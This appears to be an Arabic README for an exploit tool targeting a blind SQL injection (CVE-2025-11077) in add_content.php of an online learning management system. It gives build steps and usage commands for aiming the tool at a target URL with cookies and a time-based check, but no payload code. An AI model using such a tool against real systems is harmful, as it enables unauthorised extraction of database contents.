
استغلال حقن SQL الأعمى في نظام إدارة التعلم عبر الإنترنت
المؤلف: Byte Reaper
هذه الثغرة عبارة عن حقن SQL أعمى في ملف add_content.php لنظام إدارة التعلم عبر الإنترنت (CVE-2025-11077)، مما يسمح للمهاجم باستخراج معلومات قاعدة البيانات عن طريق إرسال طلبات POST مُعدّة.
Linux x86_64
GCC
gcc exploit.c argparse.c -o CVE-2025-11077 -lcurl
- HELP :
./CVE-2025-11077 -h
- Target URL (base url)
./CVE-2025-11077 -u http://[IP]
- log file :
./CVE-2025-11077 -f [FILE]
- Check time-based blind :
./CVE-2025-11077 -u http://[IP] -b
- Cookies FILE :
./CVE-2025-11077 -u http://[IP] -c [FILE]
MIT